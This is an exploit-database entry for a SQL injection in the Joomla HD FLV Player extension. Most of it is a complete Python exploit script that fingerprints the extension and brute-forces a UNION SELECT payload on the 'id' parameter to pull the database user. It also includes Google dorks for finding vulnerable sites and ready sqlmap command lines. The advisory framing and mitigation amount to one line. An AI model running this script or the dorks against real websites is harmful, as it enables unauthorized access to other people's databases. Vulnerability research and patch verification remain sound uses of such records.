Joomla HD FLV 2.1.0.1 and below SQL Injection

vendor:

HD FLV Player

by:

Claudio Viviani

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: HD FLV Player

Affected Version From: 2.1.0.1 and below

Affected Version To: 2.1.0.1 and below

Patch Exists: YES

Related CWE: N/A

CPE: a:hdflvplayer:hd_flv_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: BackBox 3.x/4.x

2014

Joomla HD FLV 2.1.0.1 and below SQL Injection

The variable 'id' is not sanitized, allowing for an attacker to inject malicious SQL code into the vulnerable application. Over 80,000 downloads of the software have been reported on the official website.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Exploit Title :  Joomla HD FLV 2.1.0.1 and below SQL Injection
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.hdflvplayer.net/
#
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
#
# Dork google 1:  inurl:/component/hdflvplayer/
# Dork google 2:  inurl:com_hdflvplayer    
#
# Date : 2014-11-11
#
# Tested on : BackBox 3.x/4.x
#
# Info: The variable "id" is not sanitized (again)
#       Over 80.000 downloads (statistic reported on official site)
#
#
# Video Demo: http://youtu.be/-EdOQSjAhW8
#
# Poc: 
#      http://www.target.it/index.php?option=com_hdflvplayer&id=1[Sqli]
#      http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6 [SQLi]/page/1 (url rewrite)
#
# Poc sqlmap:
#            sqlmap -u "http://www.target.it/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql
#            sqlmap -u "http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6*" --dbms mysql (url rewrite)
#
# http connection
import urllib, urllib2
# string manipulation
import re
# Errors management
import sys
# Args management
import optparse

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url

banner = """
        _______                      __           ___ ___ ______      
       |   _   .-----.-----.--------|  .---.-.   |   Y   |   _  \     
       |___|   |  _  |  _  |        |  |  _  |   |.  1   |.  |   \    
       |.  |   |_____|_____|__|__|__|__|___._|   |.  _   |.  |    \   
       |:  1   |                                 |:  |   |:  1    /   
       |::.. . |                                 |::.|:. |::.. . /    
       `-------'                                 `--- ---`------'     
        _______ ___     ___ ___     _______ __                        
       |   _   |   |   |   Y   |   |   _   |  .---.-.--.--.-----.----.
       |.  1___|.  |   |.  |   |   |.  1   |  |  _  |  |  |  -__|   _|
       |.  __) |.  |___|.  |   |   |.  ____|__|___._|___  |_____|__|  
       |:  |   |:  1   |:  1   |   |:  |            |_____|           
       |::.|   |::.. . |\:.. ./    |::.|                              
       `---'   `-------' `---'     `---' 
                                              <= 2.1.0.1 Sql Injection

                                Written by:

                              Claudio Viviani

                           http://www.homelab.it

                              info@homelab.it
                          homelabit@protonmail.ch

                      https://www.facebook.com/homelabit
                        https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
             https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)

host = checkurl(options.target)

checkext = 0

evilurl = { '/index.php?option=com_hdflvplayer&id=-9404%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29' : '/index.php?option=com_hdflvplayer&id=[SQLi]' }

char = "%2CNULL"
endurl = "%2CNULL%23"
bar = "#"

print(banner)

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

sys.stdout.write("\r[+] Searching HD FLV Extension...: ")

try:
   req = urllib2.Request(host+'/index.php?option=com_hdflvplayer&task=languagexml', None, headers)
   response = urllib2.urlopen(req).readlines()

   for line_version in response:

      if not line_version.find("<?xml version=\"1.0\" encoding=\"utf-8\"?>") == -1:
         checkext += 1
      else:
         checkext += 0

   if checkext > 0:   
      sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
   else:
      sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
      sys.exit(1)
 
except urllib2.HTTPError:
   sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
   sys.exit(1)

except urllib2.URLError as e:
   print("\n[X] Connection Error: "+str(e.code))
   sys.exit(1)

print("")

sys.stdout.write("\r[+] Checking Version: ")

try:
   req = urllib2.Request(host+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
   response = urllib2.urlopen(req).readlines()
  
   for line_version in response:

      if not line_version.find("<version>") == -1:

         VER = re.compile('>(.*?)<').search(line_version).group(1)

         sys.stdout.write("\r[+] Checking Version: "+str(VER))

except urllib2.HTTPError:
   sys.stdout.write("\r[+] Checking Version: Unknown")

except urllib2.URLError as e:
   print("\n[X] Connection Error: "+str(e.code))
   sys.exit(1)

print("")

for exploiting, dork in evilurl.iteritems():

   s = ""
   barcount = ""
   for a in range(1,100):
      
      s += char
      try:
         req = urllib2.Request(host+exploiting+s+endurl, None, headers)
         response = urllib2.urlopen(req).read()

         if "h0m3l4b1t" in response:
            print "\n[!] VULNERABLE"
            current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)
            print "[*] Username: "+str(current_user)
            print ""
            print "[*] 3v1l Url: "+host+exploiting+s+endurl
            sys.exit(0)

      except urllib2.HTTPError as e:
         response = e.read()
         if "h0m3l4b1t" in response:
            print "\n[!] VULNERABLE"
            current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)
            print "[*] Username: "+str(current_user)
            print ""
            print "[*] 3v1l Url: "+host+exploiting+s+endurl
            sys.exit(0)

      except urllib2.URLError as e:
         print("\n[X] Connection Error: "+str(e.code))
         sys.exit(1)

      barcount += bar
      sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
      sys.stdout.flush()

print "\n[X] Not vulnerable :("
print "[X] Try with tool like sqlmap and url "+host+"/index.php?option=com_hdflvplayer&id=1 (valid id number)"